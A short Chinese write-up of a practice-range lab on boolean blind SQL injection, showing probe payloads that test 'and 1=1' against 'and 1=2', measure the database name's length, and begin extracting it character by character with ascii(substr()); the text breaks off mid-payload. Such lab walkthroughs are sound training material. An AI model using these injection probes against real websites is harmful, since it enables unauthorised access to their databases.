封神台SQL注入-基础靶场1-布尔盲注

文章目录

    • 布尔盲注(一)
    • 布尔盲注(二)
    • 布尔盲注(三)

布尔盲注(一)

1、判断注入类型

id=1 and 1=1//有数据
id=1 and 1=2//no results found

判断为数字型布尔盲注

2、判断数据库长度,获取数据库名

and length(database())=1

封神台SQL注入-基础靶场1-布尔盲注_第1张图片数据库名长12

抓包,爆破,获取

and ascii(substr(database(),1

你可能感兴趣的:(SQL注入,布尔盲注,封神台,SQL注入)